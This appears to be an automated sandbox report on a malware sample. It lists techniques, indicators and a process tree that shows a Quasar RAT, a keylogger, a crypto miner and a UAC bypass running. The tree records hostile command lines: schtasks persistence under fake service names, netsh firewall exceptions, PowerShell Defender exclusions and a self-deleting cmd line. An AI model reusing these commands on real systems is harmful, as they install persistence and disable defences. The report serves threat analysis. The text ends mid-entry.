Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5}	PCclear_Eng_mini.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5}\Compatibility Flags = "1024"	PCclear_Eng_mini.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Synaptics.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	4363463463464363463463463.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
30748	PING.EXE
50920	PING.EXE
7468	PING.EXE
53932	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 37 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
21312	schtasks.exe
44872	schtasks.exe
50684	schtasks.exe
1348	schtasks.exe
9456	schtasks.exe
65056	schtasks.exe
26368	schtasks.exe
9280	schtasks.exe
24396	schtasks.exe
11136	schtasks.exe
26588	schtasks.exe
22580	schtasks.exe
35404	schtasks.exe
33476	schtasks.exe
38916	schtasks.exe
9200	schtasks.exe
22324	schtasks.exe
62852	schtasks.exe
27416	schtasks.exe
38720	schtasks.exe
51076	schtasks.exe
47732	schtasks.exe
4764	schtasks.exe
8472	schtasks.exe
8548	schtasks.exe
22736	schtasks.exe
37248	schtasks.exe
28452	schtasks.exe
3660	schtasks.exe
28360	schtasks.exe
39772	schtasks.exe
48328	schtasks.exe
34288	schtasks.exe
34184	schtasks.exe
9708	schtasks.exe
53004	schtasks.exe
39436	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2292	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4944	njrtdhadawt.exe
4944	njrtdhadawt.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4908	7zFM.exe
1428	sela.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeRestorePrivilege	4908	7zFM.exe
Token: 35	4908	7zFM.exe
Token: SeSecurityPrivilege	4908	7zFM.exe
Token: SeDebugPrivilege	2300	._cache_4363463463464363463463463.exe
Token: SeDebugPrivilege	3656	._cache_Synaptics.exe
Token: SeDebugPrivilege	3580	Client-built.exe
Token: SeDebugPrivilege	788	SGVP%20Client%20Users.exe
Token: SeDebugPrivilege	3024	SYSTEM26.exe
Token: SeDebugPrivilege	3084	._cache_4363463463464363463463463.exe
Token: SeDebugPrivilege	4416	._cache_4363463463464363463463463.exe
Token: SeDebugPrivilege	1428	sela.exe
Token: 33	1428	sela.exe
Token: SeIncBasePriorityPrivilege	1428	sela.exe
Token: SeDebugPrivilege	2144	._cache_4363463463464363463463463.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4908	7zFM.exe
4908	7zFM.exe
3024	SYSTEM26.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
3024	SYSTEM26.exe

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
3024	SYSTEM26.exe
668	PCclear_Eng_mini.exe
668	PCclear_Eng_mini.exe
2292	EXCEL.EXE
2292	EXCEL.EXE
2292	EXCEL.EXE
2292	EXCEL.EXE
2292	EXCEL.EXE
2292	EXCEL.EXE
2292	EXCEL.EXE
2292	EXCEL.EXE

Suspicious use of WriteProcessMemory 55 IoCs

description	pid	Process	procid_target
PID 1372 wrote to memory of 2300	1372	4363463463464363463463463.exe	83
PID 1372 wrote to memory of 2300	1372	4363463463464363463463463.exe	83
PID 1372 wrote to memory of 2300	1372	4363463463464363463463463.exe	83
PID 1372 wrote to memory of 2184	1372	4363463463464363463463463.exe	85
PID 1372 wrote to memory of 2184	1372	4363463463464363463463463.exe	85
PID 1372 wrote to memory of 2184	1372	4363463463464363463463463.exe	85
PID 2184 wrote to memory of 3656	2184	Synaptics.exe	86
PID 2184 wrote to memory of 3656	2184	Synaptics.exe	86
PID 2184 wrote to memory of 3656	2184	Synaptics.exe	86
PID 2300 wrote to memory of 1428	2300	._cache_4363463463464363463463463.exe	89
PID 2300 wrote to memory of 1428	2300	._cache_4363463463464363463463463.exe	89
PID 2300 wrote to memory of 1428	2300	._cache_4363463463464363463463463.exe	89
PID 4056 wrote to memory of 3432	4056	4363463463464363463463463.exe	90
PID 4056 wrote to memory of 3432	4056	4363463463464363463463463.exe	90
PID 4056 wrote to memory of 3432	4056	4363463463464363463463463.exe	90
PID 2300 wrote to memory of 3580	2300	._cache_4363463463464363463463463.exe	93
PID 2300 wrote to memory of 3580	2300	._cache_4363463463464363463463463.exe	93
PID 3580 wrote to memory of 1348	3580	Client-built.exe	94
PID 3580 wrote to memory of 1348	3580	Client-built.exe	94
PID 3580 wrote to memory of 3024	3580	Client-built.exe	97
PID 3580 wrote to memory of 3024	3580	Client-built.exe	97
PID 3024 wrote to memory of 4764	3024	SYSTEM26.exe	100
PID 3024 wrote to memory of 4764	3024	SYSTEM26.exe	100
PID 416 wrote to memory of 3084	416	4363463463464363463463463.exe	102
PID 416 wrote to memory of 3084	416	4363463463464363463463463.exe	102
PID 416 wrote to memory of 3084	416	4363463463464363463463463.exe	102
PID 2300 wrote to memory of 2476	2300	._cache_4363463463464363463463463.exe	104
PID 2300 wrote to memory of 2476	2300	._cache_4363463463464363463463463.exe	104
PID 3084 wrote to memory of 3116	3084	._cache_4363463463464363463463463.exe	105
PID 3084 wrote to memory of 3116	3084	._cache_4363463463464363463463463.exe	105
PID 3084 wrote to memory of 3116	3084	._cache_4363463463464363463463463.exe	105
PID 3768 wrote to memory of 4416	3768	4363463463464363463463463.exe	108
PID 3768 wrote to memory of 4416	3768	4363463463464363463463463.exe	108
PID 3768 wrote to memory of 4416	3768	4363463463464363463463463.exe	108
PID 3084 wrote to memory of 668	3084	._cache_4363463463464363463463463.exe	111
PID 3084 wrote to memory of 668	3084	._cache_4363463463464363463463463.exe	111
PID 3084 wrote to memory of 668	3084	._cache_4363463463464363463463463.exe	111
PID 4416 wrote to memory of 3560	4416	._cache_4363463463464363463463463.exe	112
PID 4416 wrote to memory of 3560	4416	._cache_4363463463464363463463463.exe	112
PID 4416 wrote to memory of 3560	4416	._cache_4363463463464363463463463.exe	112
PID 4416 wrote to memory of 4944	4416	._cache_4363463463464363463463463.exe	114
PID 4416 wrote to memory of 4944	4416	._cache_4363463463464363463463463.exe	114
PID 4416 wrote to memory of 4944	4416	._cache_4363463463464363463463463.exe	114
PID 872 wrote to memory of 4400	872	Client.exe	115
PID 872 wrote to memory of 4400	872	Client.exe	115
PID 872 wrote to memory of 4400	872	Client.exe	115
PID 4944 wrote to memory of 1512	4944	njrtdhadawt.exe	116
PID 4944 wrote to memory of 1512	4944	njrtdhadawt.exe	116
PID 4944 wrote to memory of 1512	4944	njrtdhadawt.exe	116
PID 1512 wrote to memory of 4420	1512	cmd.exe	118
PID 1512 wrote to memory of 4420	1512	cmd.exe	118
PID 1512 wrote to memory of 4420	1512	cmd.exe	118
PID 476 wrote to memory of 2144	476	4363463463464363463463463.exe	120
PID 476 wrote to memory of 2144	476	4363463463464363463463463.exe	120
PID 476 wrote to memory of 2144	476	4363463463464363463463463.exe	120

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 4 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
28144	attrib.exe
28108	attrib.exe
60092	attrib.exe
59388	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4908

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
- Quasar RAT
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1372
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Users\Admin\Desktop\Files\sela.exe
    "C:\Users\Admin\Desktop\Files\sela.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    PID:1428
- - C:\Users\Admin\Desktop\Files\Client-built.exe
    "C:\Users\Admin\Desktop\Files\Client-built.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3580
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\SYSTEM26.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1348
  - - C:\Users\Admin\AppData\Roaming\SubDir\SYSTEM26.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\SYSTEM26.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3024
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\SYSTEM26.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4764
- - C:\Users\Admin\Desktop\Files\svchost.exe
    "C:\Users\Admin\Desktop\Files\svchost.exe"
    3⤵
    - Executes dropped EXE
    PID:2476
- - C:\Users\Admin\Desktop\Files\mimilove.exe
    "C:\Users\Admin\Desktop\Files\mimilove.exe"
    3⤵
    PID:7504
- C:\ProgramData\Synaptics\Synaptics.exe
  "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2184
- - C:\Users\Admin\Desktop\._cache_Synaptics.exe
    "C:\Users\Admin\Desktop\._cache_Synaptics.exe" InjUpdate
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3656
  - - C:\Users\Admin\Desktop\Files\injector.exe
      "C:\Users\Admin\Desktop\Files\injector.exe"
      4⤵
      PID:8940
  - - C:\Users\Admin\Desktop\Files\uac_bypass.exe
      "C:\Users\Admin\Desktop\Files\uac_bypass.exe"
      4⤵
      PID:8508
    - - C:\Users\Admin\Desktop\Files\._cache_uac_bypass.exe
        
        "C:\Users\Admin\Desktop\Files\._cache_uac_bypass.exe"
        5⤵
        
        PID:9860
      - C:\Users\Admin\Desktop\Files\Files\xmrig.exe
        
        "C:\Users\Admin\Desktop\Files\Files\xmrig.exe"
        6⤵
        
        PID:21028
      - C:\Users\Admin\Desktop\Files\Files\kyhjasehs.exe
        
        "C:\Users\Admin\Desktop\Files\Files\kyhjasehs.exe"
        6⤵
        
        PID:35488
      - C:\Users\Admin\Desktop\Files\Files\gdwadtyjuesfshas.exe
        
        "C:\Users\Admin\Desktop\Files\Files\gdwadtyjuesfshas.exe"
        6⤵
        
        PID:34880
      - C:\Users\Admin\Desktop\Files\Files\lkyhjksefa.exe
        
        "C:\Users\Admin\Desktop\Files\Files\lkyhjksefa.exe"
        6⤵
        
        PID:35576
  - - C:\Users\Admin\Desktop\Files\jdrgsotrti.exe
      "C:\Users\Admin\Desktop\Files\jdrgsotrti.exe"
      4⤵
      PID:8072
  - - C:\Users\Admin\Desktop\Files\billi_e58d74e455634dc695ed8a7b8b320325.exe.dom_1.exe
      "C:\Users\Admin\Desktop\Files\billi_e58d74e455634dc695ed8a7b8b320325.exe.dom_1.exe"
      4⤵
      PID:6168
  - - C:\Users\Admin\Desktop\Files\newest.exe
      "C:\Users\Admin\Desktop\Files\newest.exe"
      4⤵
      PID:17188
    - - C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        5⤵
        
        PID:58516
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:36464
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        6⤵
        Modifies Windows Firewall
        
        PID:48608
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:48508
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 1364
        6⤵
        
        PID:43832
  - - C:\Users\Admin\Desktop\Files\tyhkamwdmrg.exe
      "C:\Users\Admin\Desktop\Files\tyhkamwdmrg.exe"
      4⤵
      PID:62260
  - - C:\Users\Admin\Desktop\Files\fud2.exe
      "C:\Users\Admin\Desktop\Files\fud2.exe"
      4⤵
      PID:26384
    - - \??\c:\users\admin\desktop\files\fud2.exe
        
        c:\users\admin\desktop\files\fud2.exe
        5⤵
        
        PID:53540
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Microsoft Service" /sc ONLOGON /tr "C:\Windows\system32\SubDir\fud2.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:21312
    - - C:\Windows\Resources\Themes\icsys.icn.exe
        
        C:\Windows\Resources\Themes\icsys.icn.exe
        5⤵
        
        PID:20000
      - \??\c:\windows\resources\themes\explorer.exe
        
        c:\windows\resources\themes\explorer.exe
        6⤵
        
        PID:54880
        
        \??\c:\windows\resources\spoolsv.exe
        
        c:\windows\resources\spoolsv.exe SE
        7⤵
        
        PID:30828
        
        \??\c:\windows\resources\svchost.exe
        
        c:\windows\resources\svchost.exe
        8⤵
        
        PID:30984
        
        \??\c:\windows\resources\spoolsv.exe
        
        c:\windows\resources\spoolsv.exe PR
        9⤵
        
        PID:32416
        
        \??\c:\windows\resources\spoolsv.exe
        
        c:\windows\resources\spoolsv.exe PR
        9⤵
        
        PID:37656
        
        \??\c:\windows\resources\themes\explorer.exe
        
        c:\windows\resources\themes\explorer.exe
        10⤵
        
        PID:50964
        
        \??\c:\windows\resources\spoolsv.exe
        
        c:\windows\resources\spoolsv.exe SE
        11⤵
        
        PID:39528
        
        C:\Windows\Explorer.exe
        
        C:\Windows\Explorer.exe
        11⤵
        
        PID:48728
  - - C:\Users\Admin\Desktop\Files\AsyncClient.exe
      "C:\Users\Admin\Desktop\Files\AsyncClient.exe"
      4⤵
      PID:55972
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"' & exit
        5⤵
        
        PID:33360
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"'
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:39772
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDD13.tmp.bat""
        5⤵
        
        PID:35408
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:50968
      - C:\Users\Admin\AppData\Local\Temp\update.exe
        
        "C:\Users\Admin\AppData\Local\Temp\update.exe"
        6⤵
        
        PID:43556
  - - C:\Users\Admin\Desktop\Files\64.exe
      "C:\Users\Admin\Desktop\Files\64.exe"
      4⤵
      PID:27000
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c color 0a
        5⤵
        
        PID:32332
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp 936
        5⤵
        
        PID:31472
      - C:\Windows\system32\chcp.com
        
        chcp 936
        6⤵
        
        PID:36036
  - - C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe
      "C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe"
      4⤵
      PID:38812

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4056
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3432
- - C:\Users\Admin\Desktop\Files\SGVP%20Client%20Users.exe
    "C:\Users\Admin\Desktop\Files\SGVP%20Client%20Users.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:788
- - C:\Users\Admin\Desktop\Files\Client.exe
    "C:\Users\Admin\Desktop\Files\Client.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:872
  - - C:\Users\Admin\AppData\Local\Temp\WindowsServices.exe
      "C:\Users\Admin\AppData\Local\Temp\WindowsServices.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4400
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:5800
- - C:\Users\Admin\Desktop\Files\k360.exe
    "C:\Users\Admin\Desktop\Files\k360.exe"
    3⤵
    PID:6172
- - C:\Users\Admin\Desktop\Files\IATInfect2008_64.exe
    "C:\Users\Admin\Desktop\Files\IATInfect2008_64.exe"
    3⤵
    PID:8616
- - C:\Users\Admin\Desktop\Files\Krishna33.exe
    "C:\Users\Admin\Desktop\Files\Krishna33.exe"
    3⤵
    PID:9496
  - - C:\Users\Admin\Desktop\Files\._cache_Krishna33.exe
      "C:\Users\Admin\Desktop\Files\._cache_Krishna33.exe"
      4⤵
      PID:3892
    - - C:\Users\Admin\Desktop\Files\Files\injector.exe
        
        "C:\Users\Admin\Desktop\Files\Files\injector.exe"
        5⤵
        
        PID:30048
      - C:\Windows\system32\SubDir\Panel.exe
        
        "C:\Windows\system32\SubDir\Panel.exe"
        6⤵
        
        PID:66424
    - - C:\Users\Admin\Desktop\Files\Files\artifact.exe
        
        "C:\Users\Admin\Desktop\Files\Files\artifact.exe"
        5⤵
        
        PID:46648
    - - C:\Users\Admin\Desktop\Files\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
        
        "C:\Users\Admin\Desktop\Files\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"
        5⤵
        
        PID:1212
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 576
        6⤵
        Program crash
        
        PID:52108
    - - C:\Users\Admin\Desktop\Files\Files\Uploader.exe
        
        "C:\Users\Admin\Desktop\Files\Files\Uploader.exe"
        5⤵
        
        PID:55164
    - - C:\Users\Admin\Desktop\Files\Files\Extension2.exe
        
        "C:\Users\Admin\Desktop\Files\Files\Extension2.exe"
        5⤵
        
        PID:66248
    - - C:\Users\Admin\Desktop\Files\Files\joiner.exe
        
        "C:\Users\Admin\Desktop\Files\Files\joiner.exe"
        5⤵
        
        PID:55188
    - - C:\Users\Admin\Desktop\Files\Files\dayum.exe
        
        "C:\Users\Admin\Desktop\Files\Files\dayum.exe"
        5⤵
        
        PID:54232
    - - C:\Users\Admin\Desktop\Files\Files\defender64.exe
        
        "C:\Users\Admin\Desktop\Files\Files\defender64.exe"
        5⤵
        
        PID:54236
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:28452
    - - C:\Users\Admin\Desktop\Files\Files\upm2008.exe
        
        "C:\Users\Admin\Desktop\Files\Files\upm2008.exe"
        5⤵
        
        PID:53172
    - - C:\Users\Admin\Desktop\Files\Files\jgesfyhjsefa.exe
        
        "C:\Users\Admin\Desktop\Files\Files\jgesfyhjsefa.exe"
        5⤵
        
        PID:65096
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\Files\jgesfyhjsefa.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:38916
- - C:\Users\Admin\Desktop\Files\dmshell.exe
    "C:\Users\Admin\Desktop\Files\dmshell.exe"
    3⤵
    PID:9456
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd
      4⤵
      PID:64144
- - C:\Users\Admin\Desktop\Files\fusca%20game.exe
    "C:\Users\Admin\Desktop\Files\fusca%20game.exe"
    3⤵
    PID:20300
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\fusca%20game.exe" "fusca%20game.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:28536
- - C:\Users\Admin\Desktop\Files\file.exe
    "C:\Users\Admin\Desktop\Files\file.exe"
    3⤵
    PID:49344

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:416
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3084
- - C:\Users\Admin\Desktop\Files\keylogger.exe
    "C:\Users\Admin\Desktop\Files\keylogger.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3116
- - C:\Users\Admin\Desktop\Files\PCclear_Eng_mini.exe
    "C:\Users\Admin\Desktop\Files\PCclear_Eng_mini.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:668
- - C:\Users\Admin\Desktop\Files\Ghost.exe
    "C:\Users\Admin\Desktop\Files\Ghost.exe"
    3⤵
    PID:10164
  - - C:\Users\Admin\Desktop\Files\._cache_Ghost.exe
      "C:\Users\Admin\Desktop\Files\._cache_Ghost.exe"
      4⤵
      PID:3396
  - - C:\ProgramData\Synaptics\Synaptics.exe
      "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
      4⤵
      PID:34452
    - - C:\Users\Admin\Desktop\Files\._cache_Synaptics.exe
        
        "C:\Users\Admin\Desktop\Files\._cache_Synaptics.exe" InjUpdate
        5⤵
        
        PID:48300
- - C:\Users\Admin\Desktop\Files\SteamDetector.exe
    "C:\Users\Admin\Desktop\Files\SteamDetector.exe"
    3⤵
    PID:11344
  - - C:\Users\Admin\AppData\Roaming\SteamDetector.exe
      "C:\Users\Admin\AppData\Roaming\SteamDetector.exe"
      4⤵
      PID:61580
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\SteamDetector.exe" "SteamDetector.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:13544
- - C:\Users\Admin\Desktop\Files\msedge..exe
    "C:\Users\Admin\Desktop\Files\msedge..exe"
    3⤵
    PID:10648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\msedge..exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:34928
- - C:\Users\Admin\Desktop\Files\mac.exe
    "C:\Users\Admin\Desktop\Files\mac.exe"
    3⤵
    PID:59420
- - C:\Users\Admin\Desktop\Files\script.exe
    "C:\Users\Admin\Desktop\Files\script.exe"
    3⤵
    PID:17004

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3768
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4416
- - C:\Users\Admin\Desktop\Files\ciscotest.exe
    "C:\Users\Admin\Desktop\Files\ciscotest.exe"
    3⤵
    - Blocklisted process makes network request
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3560
- - C:\Users\Admin\Desktop\Files\njrtdhadawt.exe
    "C:\Users\Admin\Desktop\Files\njrtdhadawt.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4944
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\Files\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\DAAFBAKECAEG" & exit
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1512
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4420
- - C:\Users\Admin\Desktop\Files\aaa%20(3).exe
    "C:\Users\Admin\Desktop\Files\aaa%20(3).exe"
    3⤵
    PID:37956
- - C:\Users\Admin\Desktop\Files\msf.exe
    "C:\Users\Admin\Desktop\Files\msf.exe"
    3⤵
    PID:44672
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 44672 -s 1040
      4⤵
      Program crash
      PID:36984
- - C:\Users\Admin\Desktop\Files\856.exe
    "C:\Users\Admin\Desktop\Files\856.exe"
    3⤵
    PID:47456
- - C:\Users\Admin\Desktop\Files\Client-built.exe
    "C:\Users\Admin\Desktop\Files\Client-built.exe"
    3⤵
    PID:52288
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:24396
- - C:\Users\Admin\Desktop\Files\XClient.exe
    "C:\Users\Admin\Desktop\Files\XClient.exe"
    3⤵
    PID:19736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:17984
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:45728
- - C:\Users\Admin\Desktop\Files\mrdgasdthawed.exe
